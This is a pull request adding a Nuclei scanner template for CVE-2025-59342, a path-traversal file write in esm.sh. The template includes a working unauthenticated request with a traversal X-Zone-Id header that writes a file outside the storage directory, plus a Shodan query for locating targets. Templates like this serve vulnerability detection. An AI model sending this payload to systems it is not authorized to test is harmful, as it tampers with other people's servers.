### PR TITLE
Add CVE-2025-59342.yaml - esm.sh <= v136 - Arbitrary File Write

### DIFF
--- a/http/cves/2025/CVE-2025-59342.yaml
+++ b/http/cves/2025/CVE-2025-59342.yaml
@@ -1,0 +1,66 @@
+id: CVE-2025-59342
+
+info:
+  name: esm.sh <= v136 - Arbitrary File Write via Path Traversal
+  author: 0x_Akoko
+  severity: medium
+  description: |
+   esm.sh <= 136 contains a path traversal caused by improper canonicalization of the X-Zone-Id HTTP header, letting attackers write files outside the intended storage directory, exploit requires crafted header input.
+  impact: |
+   Attackers can write files to arbitrary directories, potentially leading to system compromise or data tampering.
+  remediation: |
+   Update to a version later than 136 or the latest available version.
+  reference:
+    - https://github.com/esm-dev/esm.sh/security/advisories/GHSA-g2h5-cvvr-7gmw
+    - https://www.exploit-db.com/exploits/52461
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-59342
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2025-59342
+    cwe-id: CWE-24
+    epss-score: 0.02
+    epss-percentile: 0.08
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: esm-dev
+    product: esm.sh
+    shodan-query: http.html:"esm.sh"
+  tags: cve,cve2025,esm,path-traversal,file-write,unauth
+
+variables:
+  randfile: "{{to_lower(rand_text_alpha(8))}}"
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 200
+          - contains_any(body, "esm.sh", "A no-build JavaScript CDN", "import React from")
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        POST /transform HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        X-Zone-Id: ../../modules/transform/{{randfile}}/
+
+        {"filename":"{{randfile}}.js","lang":"js","code":"console.log('nuclei');","importMap":{"imports":{"react":"https://esm.sh/react"}},"target":"es2022","sourceMap":"external","minify":true}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 200
+          - contains(content_type, "application/json")
+          - contains_all(body, "code", "map")
+        condition: and


### PR DESCRIPTION
Added CVE-2025-59342 entry detailing an arbitrary file write vulnerability in esm.sh due to path traversal.

### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
